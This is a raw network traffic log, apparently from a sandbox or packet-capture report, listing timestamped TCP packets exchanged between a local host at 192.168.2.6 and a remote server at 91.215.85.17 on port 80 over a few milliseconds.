                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753082037 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753093958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753106117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753127098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753138065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753139973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753154039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753177881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753196001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753209114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753232956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753267050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753282070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753293037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753305912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753329992 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753432989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753446102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753458023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753468990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753480911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753504038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753520966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753534079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753545046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753556967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753566980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753567934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753587961 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753638983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753650904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753662109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753675938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753699064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753748894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753761053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753771067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753783941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753793955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753796101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753808975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753817081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753829956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753851891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753854036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753887892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753954887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753971100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753981113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753993034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754004955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754026890 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754035950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754079103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754092932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754116058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754131079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754168034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754260063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754275084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754287004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754297972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754307032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754317999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754317999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754331112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754333973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754342079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754354000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754379034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754409075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754424095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754455090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754457951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754467964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754501104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754605055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754654884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754667044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754681110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754692078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754693031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754715919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754720926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754728079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754739046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754751921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754755020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754777908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754800081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754812002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754836082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754842997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754864931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754873037 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754888058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754911900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754929066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754957914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754992008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.754998922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755022049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755059004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755068064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755072117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755089045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755110979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755110979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755122900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755152941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755187988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755199909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755211115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755229950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755240917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755250931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755263090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755311966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755314112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755326986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755337954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755362988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755378008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755390882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755402088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755415916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755439043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755460978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755472898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755484104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755512953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755544901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755582094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755585909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755594969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755616903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755629063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755630970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755666018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755775928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755789042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755799055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755812883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755822897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755824089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755835056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755846024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755850077 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755856991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755871058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755872011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755882978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755902052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755923986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755968094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755980968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.755990982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756000996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756019115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756035089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756038904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756108999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756120920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756130934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756143093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756150007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756170034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756181955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756222010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756223917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756236076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756273985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756294966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756355047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756367922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756392956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756403923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756416082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756442070 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756454945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756467104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756491899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756496906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756504059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756546974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756567955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756581068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756591082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756611109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756623030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756647110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756659985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756680012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756704092 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756725073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756763935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756825924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756838083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756848097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756860018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756870985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756875038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756899118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756901026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756922960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756946087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.756994963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757035971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757038116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757050037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757061005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757075071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757086039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757087946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757111073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757164001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757178068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757189035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757200956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757204056 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757211924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757239103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757266998 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757276058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757288933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757338047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757353067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757364988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757376909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757401943 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757419109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757457018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757486105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757502079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757512093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757524967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757535934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757539988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757567883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757581949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757596970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757613897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757621050 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757654905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757657051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757668018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757678986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757689953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757705927 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757730007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757807970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757821083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757832050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757855892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757885933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757898092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757908106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.757919073 CET804972091.215.85.17192.168.2.6
